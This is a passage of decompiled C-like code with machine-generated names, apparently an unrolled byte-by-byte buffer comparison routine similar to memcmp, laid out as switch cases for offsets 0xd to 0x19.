																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
																	if(_t1058 ==  *(_t1340 - 0x18)) {
																		goto L162;
																	} else {
																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t280 = _t1270 > 0;
																			__eflags = _t280;
																			_t1270 = (0 | _t280) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t286 = _t1270 > 0;
																				__eflags = _t286;
																				_t1270 = (0 | _t286) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t292 = _t1270 > 0;
																					__eflags = _t292;
																					_t1270 = (0 | _t292) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x15) & 0x000000ff) - ( *(_t1340 - 0x15) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t298 = _t1270 > 0;
																						__eflags = _t298;
																						_t1270 = (0 | _t298) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L162;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x19:
																	L242:
																	__eax =  *(__esi - 0x19);
																	__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
																	if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
																		goto L255;
																	} else {
																		__eax =  *(__edx - 0x19) & 0x000000ff;
																		__ecx =  *(__esi - 0x19) & 0x000000ff;
																		__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t456 = __ecx > 0;
																			__eflags = _t456;
																			__eax = 0 | _t456;
																			__ecx = _t456 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x18) & 0x000000ff;
																			__eax =  *(__edx - 0x18) & 0x000000ff;
																			__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t462 = __ecx > 0;
																				__eflags = _t462;
																				__eax = 0 | _t462;
																				__ecx = _t462 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x17) & 0x000000ff;
																				__eax =  *(__edx - 0x17) & 0x000000ff;
																				__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t468 = __ecx > 0;
																					__eflags = _t468;
																					__eax = 0 | _t468;
																					__ecx = _t468 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x16) & 0x000000ff;
